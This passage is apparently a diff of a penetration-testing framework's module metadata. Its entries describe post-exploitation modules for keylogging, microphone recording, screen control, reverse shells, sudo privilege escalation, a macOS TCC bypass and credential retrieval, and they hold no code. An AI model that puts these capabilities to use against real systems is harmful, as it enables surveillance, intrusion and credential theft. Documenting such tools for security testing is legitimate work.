The remote database can be accessed from the command line without the need\n to authenticate, and this module abuses this functionality to query and will store the\n results.\n\n Please note: backslash quotes and your (stacked or not) queries should\n end with a semicolon.", - "references": [ - "URL-http://youtu.be/0LCLRVHX1vA" - ], - "platform": "Linux,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/dbvis_query.rb", - "is_install_path": true, - "ref_name": "multi/manage/dbvis_query", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/fileshare": { - "name": "Browse the session filesystem in a Web Browser", - "fullname": "post/multi/manage/fileshare", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "timwr" - ], - "description": "This module allows you to browse the session filesystem via a local\n browser window.", - "references": [], - "platform": "Linux,OSX,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2021-10-25 17:19:45 +0000", - "path": "/modules/post/multi/manage/fileshare.rb", - "is_install_path": true, - "ref_name": "multi/manage/fileshare", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [], - "SideEffects": [], - "Stability": [ - "crash-safe" - ] - }, - "session_types": [ - "meterpreter", - "shell", - "powershell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/hsts_eraser": { - "name": "Web browsers HSTS entries eraser", - "fullname": "post/multi/manage/hsts_eraser", - 
"aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Sheila A. Berta (UnaPibaGeek)" - ], - "description": "This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox,\n Google Chrome, Opera, Safari and wget.", - "references": [ - "URL-http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html", - "URL-https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf" - ], - "platform": "Linux,OSX,Unix,Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/hsts_eraser.rb", - "is_install_path": true, - "ref_name": "multi/manage/hsts_eraser", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/multi_post": { - "name": "Multi Manage Post Module Macro Execution", - "fullname": "post/multi/manage/multi_post", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "carlos_perez " - ], - "description": "This module will execute a list of modules given in a macro file in the format\n of against the select session checking for compatibility\n of the module against the sessions and validation of the options provided.", - "references": [], - "platform": "Linux,OSX,Solaris,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/multi_post.rb", - "is_install_path": true, - "ref_name": "multi/manage/multi_post", - "check": false, - 
"post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/open": { - "name": "Open a file or URL on the target computer", - "fullname": "post/multi/manage/open", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Eliott Teissonniere" - ], - "description": "This module will open any file or URL specified with the URI format on the\n target computer via the embedded commands such as 'open' or 'xdg-open'.", - "references": [], - "platform": "Linux,OSX,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/open.rb", - "is_install_path": true, - "ref_name": "multi/manage/open", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/play_youtube": { - "name": "Multi Manage YouTube Broadcast", - "fullname": "post/multi/manage/play_youtube", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module will broadcast a YouTube video on specified compromised systems. It will play\n the video in the target machine's native browser. 
The VID datastore option is the \"v\"\n parameter in a YouTube video's URL.\n\n Enabling the EMBED option will play the video in full screen mode through a clean interface\n but is not compatible with all videos.\n\n This module will create a custom profile for Firefox on Linux systems in the /tmp directory.", - "references": [], - "platform": "Android,Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/play_youtube.rb", - "is_install_path": true, - "ref_name": "multi/manage/play_youtube", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "audio-effects", - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/record_mic": { - "name": "Multi Manage Record Microphone", - "fullname": "post/multi/manage/record_mic", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module will enable and record your target's microphone.\n For non-Windows targets, please use Java meterpreter to be\n able to use this feature.", - "references": [], - "platform": "Linux,OSX,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/record_mic.rb", - "is_install_path": true, - "ref_name": "multi/manage/record_mic", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - 
"post_multi/manage/screensaver": { - "name": "Multi Manage the screensaver of the target computer", - "fullname": "post/multi/manage/screensaver", - "aliases": [], - "rank": 600, - "disclosure_date": null, - "type": "post", - "author": [ - "Eliott Teissonniere", - "Julien Voisin" - ], - "description": "This module allows you to turn on or off the screensaver of the target computer and also\n lock the current session.", - "references": [ - "URL-https://gitlab.gnome.org/GNOME/gnome-shell/-/issues/7530" - ], - "platform": "Linux,OSX,Solaris,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/multi/manage/screensaver.rb", - "is_install_path": true, - "ref_name": "multi/manage/screensaver", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [], - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "screen-effects" - ] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "LOCK", - "description": "Lock the current session" - }, - { - "name": "START", - "description": "Start the screensaver, may lock the current session" - }, - { - "name": "STOP", - "description": "Stop the screensaver, user may be prompted for its password" - }, - { - "name": "UNLOCK", - "description": "Unlock the current session" - } - ] - }, - "post_multi/manage/screenshare": { - "name": "Multi Manage the screen of the target meterpreter session", - "fullname": "post/multi/manage/screenshare", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "timwr" - ], - "description": "This module allows you to view and control the screen of the target computer via\n a local browser window. 
The module continually screenshots the target screen and\n also relays all mouse and keyboard events to session.", - "references": [], - "platform": "Linux,OSX,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2021-09-23 15:03:19 +0000", - "path": "/modules/post/multi/manage/screenshare.rb", - "is_install_path": true, - "ref_name": "multi/manage/screenshare", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/set_wallpaper": { - "name": "Multi Manage Set Wallpaper", - "fullname": "post/multi/manage/set_wallpaper", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "timwr" - ], - "description": "This module will set the desktop wallpaper background on the specified session.\n The method of setting the wallpaper depends on the platform type.", - "references": [], - "platform": "Android,Linux,OSX,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/set_wallpaper.rb", - "is_install_path": true, - "ref_name": "multi/manage/set_wallpaper", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/shell_to_meterpreter": { - "name": "Shell to Meterpreter Upgrade", - "fullname": "post/multi/manage/shell_to_meterpreter", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Tom Sellers " - ], - "description": 
"This module attempts to upgrade a command shell to meterpreter. The shell\n platform is automatically detected and the best version of meterpreter for\n the target is selected. Currently meterpreter/reverse_tcp is used on Windows\n and Linux, with 'python/meterpreter/reverse_tcp' used on all others.", - "references": [], - "platform": "BSD,Linux,OSX,Solaris,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/shell_to_meterpreter.rb", - "is_install_path": true, - "ref_name": "multi/manage/shell_to_meterpreter", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/sudo": { - "name": "Multiple Linux / Unix Post Sudo Upgrade Shell", - "fullname": "post/multi/manage/sudo", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "todb ", - "Ryan Baxendale " - ], - "description": "This module attempts to upgrade a shell account to UID 0 by reusing the\n given password and passing it to sudo. 
This technique relies on sudo\n versions from 2008 and later which support -A.", - "references": [ - "URL-http://www.sudo.ws/repos/sudo/file/05780f5f71fd/sudo.h" - ], - "platform": "AIX,Linux,OSX,Solaris,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/sudo.rb", - "is_install_path": true, - "ref_name": "multi/manage/sudo", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs", - "account-lockouts" - ], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": true, - "actions": [] - }, - "post_multi/manage/system_session": { - "name": "Multi Manage System Remote TCP Shell Session", - "fullname": "post/multi/manage/system_session", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module will create a Reverse TCP Shell on the target system\n using the system's own scripting environments installed on the\n target.", - "references": [], - "platform": "Linux,OSX,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/system_session.rb", - "is_install_path": true, - "ref_name": "multi/manage/system_session", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/upload_exec": { - "name": "Upload and Execute", - "fullname": "post/multi/manage/upload_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - 
"author": [ - "egypt " - ], - "description": "Push a file and execute it.", - "references": [], - "platform": "BSD,Linux,OSX,Solaris,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/upload_exec.rb", - "is_install_path": true, - "ref_name": "multi/manage/upload_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": true, - "actions": [] - }, - "post_multi/manage/zip": { - "name": "Multi Manage File Compressor", - "fullname": "post/multi/manage/zip", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module zips a file or a directory. On Linux, it uses the zip command.\n On Windows, it will try to use remote target's 7Zip if found. 
If not, it falls\n back to its Windows Scripting Host.", - "references": [], - "platform": "Linux,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/zip.rb", - "is_install_path": true, - "ref_name": "multi/manage/zip", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/recon/local_exploit_suggester": { - "name": "Multi Recon Local Exploit Suggester", - "fullname": "post/multi/recon/local_exploit_suggester", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r ", - "Mo" - ], - "description": "This module suggests local Metasploit exploits that can be used.\n\n The exploits are suggested based on the architecture and platform\n that the user has a shell opened as well as the available exploits\n in meterpreter.\n\n It's important to note that not all local exploits will be fired.\n Exploits are chosen based on these conditions: session type,\n platform, architecture, and required default options.", - "references": [], - "platform": "AIX,Android,Apple_iOS,Arista,BSD,BSDi,Brocade,Cisco,Firefox,FreeBSD,HPUX,Hardware,Irix,Java,JavaScript,Juniper,Linux,Mainframe,Mikrotik,Multi,NetBSD,Netware,NodeJS,OSX,OpenBSD,PHP,Python,R,Ruby,Solaris,Unifi,Unix,Unknown,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/recon/local_exploit_suggester.rb", - "is_install_path": true, - "ref_name": "multi/recon/local_exploit_suggester", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": 
[ - "service-resource-loss" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk", - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/recon/multiport_egress_traffic": { - "name": "Generate TCP/UDP Outbound Traffic On Multiple Ports", - "fullname": "post/multi/recon/multiport_egress_traffic", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Stuart Morgan " - ], - "description": "This module generates TCP or UDP traffic across a\n sequence of ports, and is useful for finding firewall\n holes and egress filtering. It only generates traffic\n on the port range you specify. It is up to you to\n run a responder or packet capture tool on a remote\n endpoint to determine which ports are open.", - "references": [], - "platform": "BSD,Linux,OSX,Solaris,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/recon/multiport_egress_traffic.rb", - "is_install_path": true, - "ref_name": "multi/recon/multiport_egress_traffic", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/recon/reverse_lookup": { - "name": "Reverse Lookup IP Addresses", - "fullname": "post/multi/recon/reverse_lookup", - "aliases": [ - "post/windows/gather/reverse_lookup", - "post/windows/recon/resolve_ip" - ], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mubix " - ], - "description": "This module reverse resolves an IP address or IP address range to hostnames.", - "references": [], - "platform": "BSD,Linux,OSX,Solaris,Unix,Windows", - "arch": "", - "rport": 
null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-05 13:18:35 +0000", - "path": "/modules/post/multi/recon/reverse_lookup.rb", - "is_install_path": true, - "ref_name": "multi/recon/reverse_lookup", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "powershell", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/recon/sudo_commands": { - "name": "Sudo Commands", - "fullname": "post/multi/recon/sudo_commands", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "bcoles " - ], - "description": "This module examines the sudoers configuration for the session user\n and lists the commands executable via sudo.\n\n This module also inspects each command and reports potential avenues\n for privileged code execution due to poor file system permissions or\n permitting execution of executables known to be useful for privesc,\n such as utilities designed for file read/write, user modification,\n or execution of arbitrary operating system commands.\n\n Note, you may need to provide the password for the session user.", - "references": [], - "platform": "BSD,Linux,OSX,Solaris,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/recon/sudo_commands.rb", - "is_install_path": true, - "ref_name": "multi/recon/sudo_commands", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/sap/smdagent_get_properties": { - "name": "Diagnostics 
Agent in Solution Manager, stores unencrypted credentials for Solution Manager server", - "fullname": "post/multi/sap/smdagent_get_properties", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Yvan Genuer", - "Vladimir Ivanov" - ], - "description": "This module retrieves the `secstore.properties` file on a SMDAgent. This file contains the credentials\n used by the SMDAgent to connect to the SAP Solution Manager server.", - "references": [ - "CVE-2019-0307", - "URL-https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf" - ], - "platform": "BSD,Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/multi/sap/smdagent_get_properties.rb", - "is_install_path": true, - "ref_name": "multi/sap/smdagent_get_properties", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_networking/gather/enum_brocade": { - "name": "Brocade Gather Device General Information", - "fullname": "post/networking/gather/enum_brocade", - "aliases": [ - "post/brocade/gather/enum_brocade" - ], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die" - ], - "description": "This module collects Brocade device information and configuration.\n This module has been tested against an icx6430 running 08.0.20T311.", - "references": [], - "platform": "Brocade", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 02:13:25 +0000", - "path": "/modules/post/networking/gather/enum_brocade.rb", 
- "is_install_path": true, - "ref_name": "networking/gather/enum_brocade", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_networking/gather/enum_cisco": { - "name": "Cisco Gather Device General Information", - "fullname": "post/networking/gather/enum_cisco", - "aliases": [ - "post/cisco/gather/enum_cisco" - ], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module collects a Cisco IOS or NXOS device information and configuration.", - "references": [], - "platform": "Cisco", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/networking/gather/enum_cisco.rb", - "is_install_path": true, - "ref_name": "networking/gather/enum_cisco", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_networking/gather/enum_f5": { - "name": "F5 Gather Device General Information", - "fullname": "post/networking/gather/enum_f5", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die" - ], - "description": "This module collects a F5's device information and configuration.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/networking/gather/enum_f5.rb", - "is_install_path": true, - "ref_name": "networking/gather/enum_f5", - "check": false, - 
"post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_networking/gather/enum_juniper": { - "name": "Juniper Gather Device General Information", - "fullname": "post/networking/gather/enum_juniper", - "aliases": [ - "post/juniper/gather/enum_juniper" - ], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die" - ], - "description": "This module collects a Juniper ScreenOS and JunOS device information and configuration.", - "references": [], - "platform": "Juniper", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 02:13:25 +0000", - "path": "/modules/post/networking/gather/enum_juniper.rb", - "is_install_path": true, - "ref_name": "networking/gather/enum_juniper", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_networking/gather/enum_mikrotik": { - "name": "Mikrotik Gather Device General Information", - "fullname": "post/networking/gather/enum_mikrotik", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die" - ], - "description": "This module collects Mikrotik device information and configuration.\n This module has been tested against RouterOS 6.45.9.", - "references": [], - "platform": "Mikrotik", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/networking/gather/enum_mikrotik.rb", - "is_install_path": true, - "ref_name": "networking/gather/enum_mikrotik", - 
"check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_networking/gather/enum_vyos": { - "name": "VyOS Gather Device General Information", - "fullname": "post/networking/gather/enum_vyos", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die" - ], - "description": "This module collects VyOS device information and configuration.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/networking/gather/enum_vyos.rb", - "is_install_path": true, - "ref_name": "networking/gather/enum_vyos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/admin/say": { - "name": "OS X Text to Speech Utility", - "fullname": "post/osx/admin/say", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module will speak whatever is in the 'TEXT' option on the victim machine.", - "references": [ - "URL-http://www.gabrielserafini.com/blog/2008/08/19/mac-os-x-voices-for-using-with-the-say-command/" - ], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/admin/say.rb", - "is_install_path": true, - "ref_name": "osx/admin/say", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ 
- "crash-safe" - ], - "SideEffects": [ - "audio-effects" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/capture/keylog_recorder": { - "name": "OSX Capture Userspace Keylogger", - "fullname": "post/osx/capture/keylog_recorder", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "joev " - ], - "description": "Logs all keyboard events except cmd-keys and GUI password input.\n\n Keylogs are transferred between client/server in chunks\n every SYNCWAIT seconds for reliability.\n\n Works by calling the Carbon GetKeys() hook using the DL lib\n in OSX's system Ruby. The Ruby code is executed in a shell\n command using -e, so the payload never hits the disk.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/capture/keylog_recorder.rb", - "is_install_path": true, - "ref_name": "osx/capture/keylog_recorder", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/capture/screen": { - "name": "OSX Screen Capture", - "fullname": "post/osx/capture/screen", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Peter Toth " - ], - "description": "This module takes screenshots of target desktop and automatically downloads them.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/capture/screen.rb", - "is_install_path": true, - "ref_name": 
"osx/capture/screen", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/escalate/tccbypass": { - "name": "Bypass the macOS TCC Framework", - "fullname": "post/osx/escalate/tccbypass", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mattshockl", - "timwr" - ], - "description": "This module exploits a vulnerability in the TCC daemon on macOS Catalina\n (<= 10.15.5) in order to grant TCC entitlements. The TCC daemon can be\n manipulated (by setting the HOME environment variable) to use a new user\n controlled location as the TCC database. We can then grant ourselves\n entitlements by inserting them into this new database.", - "references": [ - "CVE-2020-9934", - "URL-https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8", - "URL-https://github.com/mattshockl/CVE-2020-9934" - ], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/osx/escalate/tccbypass.rb", - "is_install_path": true, - "ref_name": "osx/escalate/tccbypass", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes", - "artifacts-on-disk", - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/gather/apfs_encrypted_volume_passwd": { - "name": "Mac OS X APFS Encrypted Volume Password Disclosure", - "fullname": "post/osx/gather/apfs_encrypted_volume_passwd", - "aliases": [], - "rank": 300, - 
